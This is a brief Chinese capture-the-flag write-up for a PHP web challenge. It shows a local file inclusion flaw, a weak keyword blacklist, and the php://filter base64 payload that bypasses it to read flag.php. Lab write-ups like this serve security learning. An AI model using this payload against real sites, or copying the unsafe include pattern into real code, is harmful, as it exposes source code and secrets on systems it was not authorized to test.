Secret 意为秘密,可知我们需要在网页中寻找到隐藏的flag文件
启动环境打开靶机
直接查看源码,发现一个文件
打开后点击 secret 但是会直接跳转到 end.php 并且提示查阅结束,说明页面跳转过快,需要手动抓放包来查看
经过拦截显示出隐藏 php 文件,访问后出现源码
<html><title>secret</title><meta charset="UTF-8">
<?phphighlight_file(__FILE__);error_reporting(0);$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";exit();}include($file);
//flag放在了flag.php里
?>
</html>
直接使用 ?file=flag.php
再尝试使用 base64 形式访问
?file=php://filter/read=convert.base64-encode/resource=flag.php
获取一段 base64 编码
翻译后得出flag
